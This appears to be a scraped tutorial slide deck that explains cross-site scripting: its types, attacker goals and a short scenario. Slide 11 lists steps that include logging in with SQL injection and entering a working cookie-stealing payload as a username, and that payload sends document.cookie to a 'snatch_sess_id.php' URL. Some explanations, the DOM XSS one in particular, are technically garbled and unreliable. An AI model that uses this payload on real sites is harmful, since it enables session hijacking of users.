An XSS attack is a type of vulnerability that allows malicious scripts to be injected into web pages viewed by other users. There are three main types: reflected XSS occurs when a link containing malicious code is clicked; stored XSS injects code directly into a vulnerable website, potentially affecting many users; DOM-based XSS involves injecting code into a website hosted on a user's local system, allowing the attacker to access that user's browser privileges. The document provides examples of how XSS attacks work and can be used to hijack accounts, insert hostile content, steal cookies, and redirect users.

1. XSS ATTACK
WEB ATTACK

2. CONTENTS
 WHAT IS XSS ATTACK
 XSS ATTACK TYPES

3. INTRODUCTION
 Cross-site scripting (XSS) is a type of computer security
vulnerability typically found in web applications that enables
malicious attackers to inject client side script into web pages viewed
by other.

4. ATTACK SCENARIO
An attacker does not target a victim directly. Instead, an attacker would exploit a
vulnerability within a website or web application that the victim would visit,
essentially using the vulnerable website as a vehicle to deliver a malicious script to
the victim’s browser.

5. ATTACK INTENT
 Hijacking Accounts
 False Advertising & inserting hostile content
 Changing of users settings
 stealing other user’s cookies
 Redirecting to other websites

6. TYPES OF ATTACK
 REFLECTED (NON PERSISTANT)
 STORED (PERSISTANT)
 DOM BASED

7. REFLECTED(NON PERSISTANT)
 Reflected XSS involves the reflecting of a malicious script off of a web application,
onto a user’s browser. The script is embedded into a link, and is only activated once
that link is clicked on.
 An attacker convinces a user to follow a malicious URL which injects code into the
resulting page.
 Now the attacker has full access to that pages content

8. STORED XSS
 Stored XSS, also known as persistent XSS, is the more damaging of
the two. It occurs when a malicious script is injected directly into a
vulnerable web application.
 An attack can affect a large amount of users and the application can
also be infected by a XSS Virus or Worm

9. DOM XSS
 Document Object Model
 Standard object model for representing html or xhtml
 Problem exists within the page’s client side script
 If an attacker hosts a malicious site, which contains a vulnerable
website on a clients local system, a script can be injected
 Now the attacker can run the privileges of that users browser on
their system.

10. ATTACK SCENARIO

11. Steps for XSS Attack
 Step1 – Open techpand.org
 Step2- Perform Login using SQL INJECTION(OR KNOW know
username and password)
 Step3- open ADD New ACCOUNT
 Step4- use below script as username
<a href=#
onclick="document.location='http://techpanda.org/snatch_sess_id.php?c='+escape
(document.cookie);">Dark</a>

13. XSS ATTACK as Dark

14. Get Cookie information